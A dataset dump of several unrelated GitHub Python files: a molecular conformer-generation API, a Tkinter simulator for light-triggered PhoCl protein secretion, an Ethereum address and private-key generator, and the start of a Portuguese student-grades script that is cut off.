model.to(device)\nmodel.eval()\n\n\n@app.post(\"/generate_conformers/\")\nasync def generate_conformers_endpoints(request: ConformerRequest):\n if request.energy_calculation not in ['xtb', 'mmff']:\n raise HTTPException(status_code=400, detail=\"Energy calculation method must be 'xtb' or 'mmff'\")\n\n result = generate_conformers(request.smiles, request.energy_calculation, request.num_conformers)\n print(result)\n return {\"message\": \"Conformer generation completed\", \"result\": result}\n\n\n\n\ndef embed_func(mol: Mol, numConfs: int, numThreads = 4) -> Mol:\n \"\"\"\n Embed multiple conformations for a given molecule.\n\n This function uses RDKit's EmbedMultipleConfs method to generate multiple\n conformations for a given RDKit molecule object.\n\n Args:\n - mol (Mol): An RDKit molecule object.\n - numConfs (int): The number of conformations to generate.\n - numThreads (int): The number of threads.\n\n Returns:\n - Mol: The RDKit molecule object with embedded conformations.\n \"\"\"\n AllChem.EmbedMultipleConfs(mol, numConfs=numConfs, numThreads=numThreads)\n return mol\n\n\ndef generate_conformers(smiles_list: List[str], energy_type: str, num_conformers: int = 10, return_sdf: bool = True) -> Dict[str, Union[List[str], List[Mol]]]:\n \"\"\"\n Generate conformers for a list of SMILES strings.\n\n This function generates conformers for each SMILES string in the given list.\n It supports energy calculation using either 'xtb' or 'mmff' methods. The function\n can return either a list of RDKit molecule objects or their SDF string representations.\n\n Args:\n - smiles_list (List[str]): A list of SMILES strings representing the molecules.\n - energy_type (str): The type of energy calculation to perform ('xtb' or 'mmff').\n - num_conformers (int, optional): The number of conformers to generate for each molecule. Defaults to 10.\n - return_sdf (bool, optional): Whether to return SDF strings instead of RDKit molecule objects. Defaults to True.\n\n Returns:\n - Dict[str, Union[List[str], List[Mol]]]: A dictionary with SMILES as keys and either a list of SDF strings\n or a list of RDKit molecule objects as values, depending on the 'return_sdf' argument.\n \"\"\"\n # Energy calculations based on the specified type\n if energy_type == 'xtb':\n energy_type = \"/home/loschen/calc/xtb-6.6.1/bin/xtb\"\n \n results = {}\n for smi in smiles_list:\n mols = sample_confs(smi, num_conformers, energy_type)\n if not mols:\n continue\n\n # Store the results\n conformer_dict = {}\n conformer_dict[\"SMILES\"] = AllChem.MolToSmiles(mols[0])\n conformer_dict[\"inchikeys\"] = AllChem.MolToInchiKey(mols[0])\n #conformer_dict[\"conformers\"] = mols\n energies = [m.xtb_energy for m in mols]\n \n mols_with_energy = list(zip(mols, energies))\n sorted_mols_with_energy = sorted(mols_with_energy, key=lambda x: x[1])\n sorted_mols, sorted_energies = zip(*sorted_mols_with_energy)\n conformer_dict[\"energies\"] = sorted_energies\n \n sdf_strings = []\n for mol in sorted_mols:\n sdf_string = MolToMolBlock(mol)\n sdf_strings.append(sdf_string)\n conformer_dict[\"SDF\"] = sdf_strings\n \n results[smi] = conformer_dict\n \n return results\n\n\ndef sample_confs(smi: str, n_confs: int, energy_type: str) -> Optional[List[Mol]]:\n \"\"\"\n Generate conformers for a given SMILES string.\n\n This function generates conformers for a molecule represented by a SMILES string.\n It involves several steps including seed generation, embedding of seeds, optional\n perturbation, and sampling of conformers. The energy calculation can be done using \n either 'mmff' or 'xtb', determined by the 'energy_type' parameter.\n\n Args:\n - smi (str): The SMILES string representing the molecule.\n - n_confs (int): The number of conformers to generate.\n - energy_type (str): The type of energy calculation to perform ('xtb' or 'mmff').\n\n Returns:\n - Optional[List[Mol]]: A list of RDKit molecule objects with generated conformers.\n Returns None if the seed generation or embedding fails.\n \"\"\"\n mol, data = get_seed(smi, dataset=args.dataset)\n if not mol:\n print('Failed to get seed', smi)\n return None\n\n n_rotable_bonds = int(data.edge_mask.sum())\n\n conformers, pdb = embed_seeds(mol, data, n_confs, single_conf=False,\n pdb=False, embed_func=embed_func, mmff=False)\n if not conformers:\n print(\"Failed to embed\", smi)\n return None\n\n if n_rotable_bonds > 0.5:\n conformers = perturb_seeds(conformers, pdb)\n\n if n_rotable_bonds > 0.5:\n conformers = sample(conformers, model, args.sigma_max, args.sigma_min, n_confs,\n args.batch_size, False, None, pdb, mol=mol)\n\n mols = [pyg_to_mol(mol, conf, (energy_type == \"mmff\"), rmsd=True) for conf in conformers]\n\n for mol, data in zip(mols, conformers):\n populate_likelihood(mol, data, water=True, xtb=energy_type)\n\n if \"xtb\" in energy_type:\n mols = [mol for mol in mols if mol.xtb_energy]\n return mols\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8090)\n #result = generate_conformers([\"CCCCO\",\"CCCCNCC\"],\"/home/loschen/calc/xtb-6.6.1/bin/xtb\",10)\n #print(result)\n ","repo_name":"chrissly31415/torsional_diffusion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23643865954","text":"\"\"\"\n-list all rate constants for creation, degradation, transport, etc.\n\n-list all initial concentrations\n\n-this must be done for both lER and mER systems\n\n-put in a light administration regimen (matrix?)\n======\n\nfor loop to step through all compartment equations (ER, cis Golgi, trans Golgi, membrane/cell external)\n\nthe PhoCl matrix should have function that can switch protein from membrane to lumen, etc. based on PhoCl transfer function \n\"\"\"\n\n#PACKAGES\nfrom __future__ import annotations\nimport webbrowser\nfrom openpyxl import load_workbook\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\nimport math\nimport numpy as np\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.messagebox\nfrom tkinter.tix import * #used for the indicator window\nfrom tkinter import filedialog as fd\nfrom tkinter.messagebox import showinfo\nfrom PIL import ImageTk, Image, ImageDraw\nfrom scipy import integrate #use solve_ivp()\nfrom tkinter.font import Font, nametofont\nimport platform\n\n# CONSTANTS\n\n# Determine platform\nSYSTEM = platform.system().lower()\n\n# Font sizes\nif SYSTEM == \"linux\":\n REG_FONT_SIZE = 8\n HEADER_FONT_SIZE = 10\nelse:\n REG_FONT_SIZE = 20\n HEADER_FONT_SIZE = 20\n\n# Fonts\nDEF_REG_FONT = \"lucida\"\nHEADER_FONT = \"lucida\"\n\n# Window size\nWX = 2400\nWY = 1400\n\n# Other sizes\nSLIDER_ENTRY_WIDTH = 6\nSLIDER_LABEL_WIDTH = 15\n\n# Website\nWEBSITE_ROOT = \"https://google.com/\"\nEQUATIONS_PAGE = \"\"\n\n# Default values\ndef_k_prod: float = 0\ndef_k_cell_to_plasma: float = 0\ndef_k_plasma_to_cell: float = 0 \ndef_k_lumen_to_out: float = 0 \ndef_k_out_to_lumen: float = 0 \ndef_c_cell: float = 0\ndef_c_plasma: float = 0\ndef_k_degradation: float = 0\nC_CELL0: float = 0\nC_PLASMA0: float = 0\nC_LUMEN0: float = 0\nC_OUT0: float = 0\n\n#FIRST, DEFINE ALL FUNCTIONS FOR ALL ORGANELLES FOR THE SOLVE_IVP CODE\n#stand-in function for now:\ndef f_shed(t, y, k_prod, k_cell_to_plasma, k_plasma_to_cell, k_lumen_to_out, k_out_to_lumen, c_cell, c_plasma, k_deg, light_regimen: list[tuple[str, float]]):\n #concentrations of proteins in various compartments\n mem_conc = y[0]\n plasma_conc = y[1]\n lumen_conc = y[2]\n out_conc = y[3]\n\n #light regimen indicator function\n chi = 0\n if t == 0:\n chi = 1\n else:\n for i in range(len(light_regimen)):\n if light_regimen[i][1] > t:\n if light_regimen[i-1][0] == \"on\":\n chi = 1\n break\n\n #final derivative equations for the concentrations\n d_cell = k_prod + k_plasma_to_cell*plasma_conc - k_cell_to_plasma*mem_conc - chi*c_cell*mem_conc\n d_plasma = k_cell_to_plasma*mem_conc - k_plasma_to_cell*plasma_conc - chi*c_plasma*plasma_conc\n d_lumen = k_out_to_lumen*out_conc - k_lumen_to_out*lumen_conc + chi*c_cell*mem_conc\n d_out = k_lumen_to_out*lumen_conc - k_out_to_lumen*out_conc + chi*c_plasma*plasma_conc\n\n out = np.array([d_cell, d_plasma, d_lumen, d_out])\n out += np.array([mem_conc, plasma_conc, lumen_conc, out_conc])*k_deg\n \n return out\n #https://www.youtube.com/watch?v=Gg--FOdupwY super helpful video to set up the final form of the function :)\n \n\ndef rmseCalc(te, y_actual, ts, y_predicted):\n # Do a linear interpolation of predicted data to check against experimental data\n n = len(te)\n ns = len(ts)\n if n != len(y_actual):\n raise ValueError(\"Something wrong with experimental data in RMSE\")\n\n if ns != len(y_predicted):\n raise ValueError(\"Something wrong with simulated data in RMSE\")\n\n sidx = 0\n mse = 0\n for i in range(n):\n t = te[i]\n for j in range(sidx, ns):\n if ts[j] > t:\n sidx = j\n break\n \n # Linear interpolation\n t0 = ts[sidx-1]\n t1 = ts[sidx]\n y0 = y_predicted[sidx-1]\n y1 = y_predicted[sidx]\n y = (y0*(t1 - t) + y1*(t - t0))/(t1 - t0)\n \n mse += (y_actual[i] - y)**2\n \n mse /= n\n return math.sqrt(mse)\n\nclass VarSlider(Frame):\n inputWindow: InputWindow\n\n def __init__(self, win, inputWindow: InputWindow, length: int, bg: str, label: str, callback=lambda x: None, from_def: float=0, to_def: float=100):\n super().__init__(win, bg=bg)\n self.inputWindow = inputWindow\n self.callback = callback\n\n self.label = Label(self, text=label + \":\", bg=bg, width=SLIDER_LABEL_WIDTH)\n self.from_input = Entry(self, width=SLIDER_ENTRY_WIDTH)\n self.from_input.insert(0, str(from_def))\n self.slider = Scale(self, length=length, bg=bg, orient=HORIZONTAL, command=self.handle_callback)\n self.to_input = Entry(self, width=SLIDER_ENTRY_WIDTH)\n self.to_input.insert(0, str(to_def))\n\n # self.columnconfigure(0, weight=20)\n # self.columnconfigure(1, weight=1)\n # self.columnconfigure(2, weight=2)\n # self.columnconfigure(3, weight=1)\n\n self.label.grid(column=0, row=0)\n self.from_input.grid(column=1, row=0, sticky=\"e\")\n self.slider.grid(column=2, row=0)\n self.to_input.grid(column=3, row=0, sticky=\"w\")\n \n def disable(self):\n self.slider['state'] = 'disabled'\n self.from_input['state'] = 'disabled'\n self.to_input['state'] = 'disabled'\n \n def enable(self):\n self.slider['state'] = 'normal'\n self.to_input['state'] = 'normal'\n self.from_input['state'] = 'normal'\n \n def handle_callback(self, value):\n self.slider[\"from\"] = self.from_input.get()\n self.slider[\"to\"] = self.to_input.get()\n self.callback(value)\n \n def get(self):\n return self.slider.get()\n\nclass InputWindow:\n var_sliders: list[VarSlider]\n rates: dict[str, float]\n\n def __init__(self, win):\n # Instantiate rates\n self.rates = {\"k_prod\": def_k_prod,\n \"k_cell_to_plasma\": def_k_cell_to_plasma,\n \"k_plasma_to_cell\": def_k_plasma_to_cell,\n \"k_lumen_to_out\": def_k_lumen_to_out,\n \"k_out_to_lumen\": def_k_out_to_lumen,\n \"c_cell\": def_c_cell,\n \"c_plasma\": def_c_plasma,\n \"k_degradation\": def_k_degradation}\n \n # Create objects of tkinter ImageTk for use in GUI\n # Load the image\n #info_img=Image.open(\"./assets/info_img.jpg\")\n #info_img = info_img.resize((20, 20))\n #info_img=ImageTk.PhotoImage(info_img)\n # Parameters\n #self.font = Font(size=12)\n \n\n\n #LIGHT FRAME \n m = 0 #row index for the light frame\n #define the subframe\n light_frame = Frame(win)\n #define labels, text entries, buttons\n light_title=Label(light_frame, text = 'Light Administration Regimen ', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold')\n lbl1=Label(light_frame, text='Time on (min, sec):')\n lbl2=Label(light_frame, text='Time off (min, sec):')\n lbl3=Label(light_frame, text='# Cycles:')\n lbl4=Label(light_frame, text = 'Time after last cycle (min, sec):')\n self.t1=Entry(light_frame, bd=7)\n self.t1.insert(0, \"0,0\")\n self.t2=Entry(light_frame, bd=7)\n self.t2.insert(0, \"0,0\")\n self.t3=Entry(light_frame, bd=7)\n self.t3.insert(0, \"1\")\n self.t4=Entry(light_frame, bd=7)\n self.t4.insert(0, \"0,0\")\n #Place all elements in subframe\n light_title.grid(row = m, column = 0, columnspan = 2, ipady = 20)\n m =+ 1\n lbl1.grid(row = m, column = 0)\n self.t1.grid(row = m, column = 1, padx=20)\n m += 1\n lbl2.grid(row = m, column = 0)\n self.t2.grid(row = m, column = 1)\n m += 1\n lbl3.grid(row = m, column = 0)\n self.t3.grid(row = m, column = 1)\n m += 1\n lbl4.grid(row = m, column = 0)\n self.t4.grid(row = m, column = 1)\n b2=Button(light_frame, bd=7, text='Reset', command = self.reset, cursor = 'hand2')\n m += 1\n b2.grid(row = m, column = 0, pady = 20, columnspan=2)\n light_frame.grid(row = 0, column = 0)\n Grid.columnconfigure(light_frame, 0, weight=1)\n Grid.columnconfigure(light_frame, 1, weight=1)\n # Create a Label Widget to display helpful tip - TODO\n # light_info = Label(light_frame, image = info_img)\n # light_info.image = info_img #keep a reference apparently??? ASK SAM\n # light_info.grid(row = 0, column = 1)\n #info text \n # light_tip=Balloon(win)\n # light_tip.bind_widget(light_info, balloonmsg=\"Python is an interpreted, high-level and general-purpose programming language \\n when does it switch to next line\") #use \\n to get to the next line\n \n\n \n #SELECT EXPERIMENTAL DATA\n experiment_frame = Frame(win)\n exp_title=Label(experiment_frame, text = 'Experimental Data (Excel Sheet)', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold')\n exp_title.grid(row = 0, column = 0, columnspan = 2)\n bexp=Button(experiment_frame, bd = 7, text='Import Data', command=self.import_data, cursor = 'hand2')\n bexp.grid(row = 1, column = 0, columnspan = 2, pady= 20)\n experiment_frame.grid(row = 1, column = 0, pady = 20)\n #Grid.columnconfigure(experiment_frame, 0, weight=1)\n #Grid.columnconfigure(experiment_frame, 1, weight=1)\n\n\n #CONSTRUCT SELECTION\n construct_frame = Frame(win)\n #title the subframe\n con_title = Label(construct_frame, text = 'Select PhoCl Construct', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold')\n con_title.grid(row = 0, column = 0, columnspan = 3)\n #define construct options\n var = IntVar()\n R_secrete = Radiobutton(construct_frame, text=\"PhoCl Secrete\", variable=var, value=1, command=lambda: self.update_sliders_frame(\"secrete\"))\n R_shed = Radiobutton(construct_frame, text=\"PhoCl Shed\", variable=var, value=2, command=lambda: self.update_sliders_frame(\"shed\"))\n R_disp = Radiobutton(construct_frame, text=\"PhoCl display\", variable=var, value=3, command=lambda: self.update_sliders_frame(\"display\"))\n #place construct options in frame\n R_secrete.grid(row = 1, column = 0, sticky = 'w')\n R_shed.grid(row = 1, column = 1, sticky = 'w')\n R_disp.grid(row = 1, column = 2, sticky = 'w')\n #place subframe in main window\n construct_frame.grid(row = 2, column = 0, pady = 20)\n \n\n\n #VARIABLE TUNERS\n s_length = 600\n s_color = 'light gray'\n tuner_frame = Frame(win, relief = 'sunken', bd = 10, bg = s_color)\n m = 0 #row index\n #title\n self.tuner_title=Label(tuner_frame, text = 'Rate Constants (PhoCl Secrete)', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold', bg = s_color)\n self.tuner_title.grid(row = m, column = 0, columnspan = 2)\n m += 1\n #protein production slider\n self.k_prod_slider = VarSlider(tuner_frame, self, length=s_length, label='k_prod', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_prod\", float(x)))\n self.k_prod_slider.grid(row=m, column = 0, columnspan = 2, sticky=\"ew\")\n m += 1 \n\n self.k_c2p_slider = VarSlider(tuner_frame, self, length=s_length, label='k_mi->mo', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_cell_to_plasma\", float(x)))\n self.k_c2p_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_p2c_slider = VarSlider(tuner_frame, self, length=s_length, label='k_mo->mi', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_plasma_to_cell\", float(x)))\n self.k_p2c_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_l2o_slider = VarSlider(tuner_frame, self, length=s_length, label='k_li->lo', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_lumen_to_out\", float(x)))\n self.k_l2o_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_o2l_slider = VarSlider(tuner_frame, self, length=s_length, label='k_lo->li', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_lumen_to_out\", float(x)))\n self.k_o2l_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.c_cell_slider = VarSlider(tuner_frame, self, length=s_length, label='L_i', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"c_cell\", float(x)))\n self.c_cell_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.c_plasma_slider = VarSlider(tuner_frame, self, length=s_length, label='L_o', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"c_plasma\", float(x)))\n self.c_plasma_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_degrad_slider = VarSlider(tuner_frame, self, length=s_length, label='k_degradation', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_degradation\", float(x)))\n self.k_degrad_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n\n #clickable links\n # self.scale_range = Label(tuner_frame, text = 'Change range of sliders', fg = 'blue', bg = s_color, font = \"lucida 16 underline\", pady = 10, cursor = 'hand2')\n # self.scale_range.grid(row = m, column = 0)\n self.eq_list = Label(tuner_frame, text = 'See construct equations', fg = 'blue', bg = s_color, font = \"lucida 16 underline\", pady = 10, cursor = 'hand2')\n self.eq_list.grid(row = m, column = 0, columnspan=2)\n # self.scale_range.bind(\"\", self.onTextClick)\n self.eq_list.bind(\"\", lambda _: webbrowser.open(f\"{WEBSITE_ROOT}/{EQUATIONS_PAGE}\", new=True))\n m += 1\n #final button\n self.bs=Button(tuner_frame, bd=7, text='Run Simulation', command=self.submit, cursor = 'hand2')\n self.bs.grid(row = m, column = 0, columnspan = 2, padx = 60, pady = 20, sticky = 'nsew')\n tuner_frame.grid(row = 3, column = 0, pady = 20)\n\n # Put sliders into list for ease of use later\n self.var_sliders = [self.k_prod_slider, self.k_c2p_slider, self.k_degrad_slider, self.k_l2o_slider, self.k_o2l_slider, self.k_p2c_slider, self.c_cell_slider, self.c_plasma_slider]\n\n # Select correct construct radio button\n R_shed.select()\n self.update_sliders_frame(\"shed\")\n\n #PLOT\n matplotlib_frame = Frame(win)\n # Some example data to display\n self.x_exp = np.linspace(0, 2 * np.pi, 400)\n self.y_exp = self.x_exp * 0\n self.x_sim = np.linspace(0, 2 * np.pi, 400)\n self.y_sim = self.x_sim * 0\n fig, self.ax = plt.subplots()\n self.ax.plot(self.x_exp, self.y_exp, label=\"experimental\")\n self.ax.plot(self.x_sim, self.y_sim, label=\"simulation\")\n self.ax.set_xlabel('Time', fontsize=16)\n self.ax.set_ylabel('Concentration/Intensity', fontsize=16)\n self.ax.legend()\n self.ax.set_title('Experimental and Simulation Plots', fontsize=20) \n self.canvas = FigureCanvasTkAgg(fig, master=matplotlib_frame) # A tk.DrawingArea.\n self.canvas.draw()\n # pack_toolbar=False will make it easier to use a layout manager later on.\n toolbar = NavigationToolbar2Tk(self.canvas, matplotlib_frame, pack_toolbar=True)\n toolbar.update()\n matplotlib_frame.grid(row = 0, column = 1, rowspan = 4, sticky='nsew')\n #toolbar.pack(side=BOTTOM, fill=X)\n self.canvas.get_tk_widget().pack(side=TOP, expand=True, fill=\"both\") #fill=BO\n\n\n\n #RMSE FRAME\n rmse_frame = Frame(win)\n self.rmse_label = Label(rmse_frame, text = 'RMSE: ')\n self.rmse_label.grid(row = 0, column = 0)\n rmse_frame.grid(row = 5, column = 1, sticky='ew')\n \n #===============================FUNCTIONS===================================================== \n\n def import_data(self):\n #delete current experimental values\n self.x_exp = []\n self.y_exp = []\n #ask user to input excel file\n file_name = fd.askopenfilename(\n title='Open a file',\n initialdir='/')\n showinfo(\n title='Selected File',\n message=file_name\n )\n workbook = load_workbook(filename=file_name)\n sheet = workbook.active #assumption that there is only one sheet in a given excel file\n #take cell values and put into x_exp and y_exp\n columnA = sheet['A'] # Column\n self.x_exp = [columnA[i].value for i in range(len(columnA))]\n columnB = sheet['B'] # Column\n self.y_exp = [columnB[i].value for i in range(len(columnB))]\n \n #clear the plot of old values\n plt.cla()\n #replot everything\n self.ax.set_xlabel('Time', fontsize=16)\n self.ax.set_ylabel('Concentration/Intensity', fontsize=16)\n self.ax.plot(self.x_exp, self.y_exp, marker='o', label=\"experimental\")\n self.ax.plot(self.x_sim, self.y_sim, label=\"simulation\")\n self.ax.legend()\n self.ax.set_title('Experimental and Simulation Plots', fontsize=20) \n self.canvas.draw()\n #clear RMSE values from display\n self.rmse_label[\"text\"] = \"RMSE: \"\n \n\n\n def submit(self):\n # STUFF FROM OLD submit FUNCTION\n dt = 1 #TEMPORARILY\n #take each text entry to get string\n onTime = str(self.t1.get())\n offTime = str(self.t2.get())\n numCycles = int(self.t3.get())\n afterTime = str(self.t4.get())\n #separate minute and sec values\n onTime = onTime.split(\",\")\n offTime = offTime.split(\",\")\n afterTime = afterTime.split(\",\")\n #convert the str values to int\n onTime = [int(i) for i in onTime] #would prefer to only use the first 2 values\n offTime = [int(i) for i in offTime]\n afterTime = [int(i) for i in afterTime]\n # Convert to seconds\n onTime = onTime[0]*60 + onTime[1]\n offTime = offTime[0]*60 + offTime[1]\n afterTime = afterTime[0]*60 + afterTime[1]\n\n # Get list of on and off times\n lightCourse: list[tuple[str, float]] = []\n t0 = t = 0\n for _ in range(numCycles):\n # Light starts on\n lightCourse.append((\"on\", t))\n # Turns off\n t += onTime\n lightCourse.append((\"off\", t))\n t += offTime\n \n t1 = t + afterTime\n \n #get array of milliseconds that say when the light is on... if the current time point evaluation is between \n #light on or off... if not between 2 nonzero values, then light is off?\n\n # STUFF FROM OLD UPDATE_VAR FUNCTION\n #delete current simulation values\n self.x_sim = []\n self.y_sim = []\n #set times\n t_span = np.array([t0, t1])\n #set initial conditions\n y0 = np.array ([C_CELL0, C_LUMEN0, C_PLASMA0, C_OUT0]) #will probably somehow need to come from the system of equations themselves, solved with an external funciton\n #Solve IVP both at intended points and at \n res = integrate.solve_ivp(f_shed, t_span, y0, args=[self.rates[x] for x in self.rates.keys()] + [lightCourse]) #TO HAVE AN ADAPTIVE SMOOTH TIME.... STUPID???\n ts = res.t\n c_cell, c_plasma, c_lumen, c_out = res.y\n #clear the plot of old values\n plt.cla()\n #replot \n self.x_sim = ts\n self.y_sim = c_out\n self.ax.set_xlabel('Time', fontsize=16)\n self.ax.set_ylabel('Concentration/Intensity', fontsize=16)\n #replot experimental times\n self.ax.plot(self.x_exp, self.y_exp, marker='o', label=\"experimental\", color = 'blue')\n #replot t_eval sim times\n self.ax.scatter(self.x_sim, self.y_sim, label=\"simulation\", color = 'red')\n self.ax.legend()\n self.ax.set_title('Experimental and Simulation Plots', fontsize=20) \n self.canvas.draw()\n #recalculate RMSE with updated experimental data\n RMSE_val = rmseCalc(self.x_exp, self.y_exp, ts, c_out)\n RMSE = str(RMSE_val)\n self.rmse_label[\"text\"] = f\"RMSE: {RMSE}\"\n \n def reset(self):\n #get rid of all text entries\n self.t1.delete(0, 'end')\n self.t2.delete(0, 'end')\n self.t3.delete(0, 'end')\n self.t4.delete(0, 'end')\n #replace default entries\n self.t1.insert(0, \"0,0\")\n self.t2.insert(0, \"0,0\")\n self.t3.insert(0, \"1\")\n self.t4.insert(0, \"0,0\")\n \n def update_sliders_frame(self, construct: str):\n if construct == \"shed\":\n for slider in self.var_sliders:\n slider.enable()\n self.tuner_title['text'] = 'Rate Constants (PhoCl Shed)'\n self.bs['state'] = 'normal'\n else:\n for slider in self.var_sliders:\n slider.disable()\n self.tuner_title['text'] = f'Rate Constants (PhoCl {\"\".join([construct[x].upper() if x == 0 else construct[x] for x in range(len(construct))])}) - UNIMPLEMENTED'\n self.bs['state'] = 'disabled'\n \n def update_slider_lims(self, n: int, slider_from: float|None, slider_to: float|None):\n if n < 0 or n > len(self.var_sliders):\n return\n \n if slider_from:\n self.var_sliders[n]['from'] = slider_from\n if slider_to:\n self.var_sliders[n]['to'] = slider_to\n \n def update_rates(self, rate: str, value: float):\n self.rates[rate] = value\n\n def onTextClick(self, event):\n tkinter.messagebox.showinfo(\"Welcome to GFG.\", \"Hi I'm your message\")\n \n\n def onConstructChoice(self, event):\n tkinter.messagebox.showinfo(\"Welcome to GFG.\", \"Hi I'm your message\")\n #if radiobutton is 1, or 2, or 3, redo the grid placing of the slider frame!\n\n \n \n\nwindow=Tk()\n\n#prevent fullscreen\nwindow.resizable(False, False)\n\n#set default font of the GUI\nwindow.option_add( \"*font\", f\"lucida {REG_FONT_SIZE}\" )\n\ninputwin=InputWindow(window)\nwindow.title('Secretion Sim')\n\n#Set the geometry of frame\nwindow.geometry(f\"{WX}x{WY}\")\n\n#Change the default Font that will affect in all the widgets\ndefault_font = nametofont(\"TkDefaultFont\")\ndefault_font.configure(size=16)\ntext_font = nametofont(\"TkTextFont\")\ntext_font.configure(size=16)\nfixed_font = nametofont(\"TkFixedFont\")\nfixed_font.configure(size=16)\n\n#change the row and column weightings \nGrid.rowconfigure(window,0,weight=1)\n#Grid.columnconfigure(window,0,weight=1)\nGrid.rowconfigure(window,1,weight=1)\nGrid.columnconfigure(window, 1, weight=3)\n\nwindow.mainloop()\n\n#EVENTUALLY, USE THE MAIN WINDOW CLASS TO CREATE TABS FOR BOTH THE SPATIAL AND TEMPORAL DYNAMICS\n\n\n\n#VARIABLE CONCENTRATIONS\n#ER\nP_mER = 4\nP_lER = 4\n#CG\nP_mCG = 4\nP_lCG = 4\n#TG\nP_mTG = 4\nP_lTG = 4\n#EC (extracellular)\nP_mEC = 4\nP_lEC = 4\n\n'''CONSTANTS===============================\n\n#PRODUCTION \nalpha_mER = 4 #rate of protein production / transport to ER that is NOT from cis Golgi\nalpha_lER = 4 #rate of degradation/transport to lysozome from ER\n\n#DEGRADATION\n#ER\ndelta_mER = 4 \ndelta_lER = 4\n#Cis Golgi\ndelta_mCG = 4\ndelta_lCG = 4\n#Trans Golgi\ndelta_mTG = 4\ndelta_lTG = 4\n#Extracellular\ndelta_mEC = 4\ndelta_lEC = 4\n\n#TRANSPORT\n#ER <=> CG\ntau_mCG_mER = 4 #rate of retrograde transport of POI from mCG to mER\ntau_mER_mCG = 4 #rate of anterograde transport of POI from mER to mCG\ntau_lCG_lER = 4 \ntau_lER_lCG = 4 \n#CG <=> TG\ntau_mCG_mTG = 4 \ntau_mTG_mCG = 4 \ntau_lCG_lTG = 4 \ntau_lTG_lCG = 4 \n#TG <=> EC\ntau_mTG_mEC = 4 \ntau_mEC_mTG = 4 \ntau_lTG_lEC = 4 \ntau_lEC_lTG = 4 \n\n#PHOCL STRENGTH MULTIPLIER\n#ER\nC_mER = 4\nC_lER = 4\n#Cis Golgi\nC_mCG = 4\nC_lCG = 4\n#Trans Golgi\nC_mTG = 4\nC_lTG = 4\n#Extracellular\nC_mEC = 4\n\n\n#COMBINE VARIABLES TO SIMPLIFY FINAL EQUATIONS:\n\n'''\n#https://www.codegrepper.com/code-examples/python/slider+python\n\n\n\n\n \n\n#graph the measured concentrations and the ODE predictions in the same graph\n#sliders will rerun the ODE sim and replot.\n\n\"\"\"\nSLiders should adjust all variables, then rerun the entire simulation with precalculated timestep\nhttps://www.pythontutorial.net/tkinter/tkinter-slider/\nmeasurements should be compared to the theoretical model, and NRMSE value should be calculated and displayed by interpolating for the same time points? \n\"\"\"\n\n\n\n#calculate RMSE values :)\n\n\n","repo_name":"UPenniGEM2022/SecretionModel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22966392228","text":"from eth_account import Account\nimport secrets\nimport argparse\nimport json\nfrom collections import defaultdict\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--number\", help=\"number of address to be generated\")\nparser.add_argument(\"-f\", \"--filename\", help=\"file name of the csv\")\nargs = parser.parse_args()\n\nnum_of_address = int(args.number)\nfile_name = args.filename \n\ndef write_csv(address, key):\n with open(file_name +'.csv', 'a') as f:\n f.write(str(address) + ',' + str(key))\n f.write('\\n')\n\ndef write_json(d):\n with open(file_name +'.json', 'a', encoding='utf-8') as f:\n json.dump(d, f, ensure_ascii=False, indent=4)\n\nd = defaultdict(list)\nfor i in range(num_of_address):\n priv = secrets.token_hex(32)\n private_key = \"0x\" + priv\n acct = Account.from_key(private_key)\n write_csv(acct.address, private_key)\n d[acct.address].append(private_key)\nwrite_json(d)","repo_name":"ruggedev/Ethereum-account-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22370519611","text":"boletim = [[], [], [], []]\nprint('-=' * 35 + '-')\nwhile True:\n o = ' '\n nome = str(input('Insira o nome do aluno: ')).capitalize()\n n1 = float(input(f'Insira a 1ª nota de {nome}: '))\n n2 = float(input(f'Insira a 2ª nota de {nome}: '))\n\n boletim[0].append(nome)\n boletim[1].append(n1)\n boletim[2].append(n2)\n boletim[3].append((n1 + n2)/2)\n\n while o not in 'SN':\n o = str(input('Deseja continuar? [S/N]: ')).upper()\n if o == 'N':\n break\n print('-=' * 35 + '-')\nprint('-=' * 35 + '-')\nprint(f'{\"N°\":<4} {\"Aluno\":<8} {\"Média\":>8}')\nfor i, c in enumerate(boletim[0]):\n print(f'{i:<4} {boletim[0][i]:<10} {boletim[3][i]:>8.2f}')\nprint('-=' * 35 + '-')\nwhile True:\n m = int(input('Insira o número do aluno que se deseja conferir às notas(999 saí): '))\n if m in 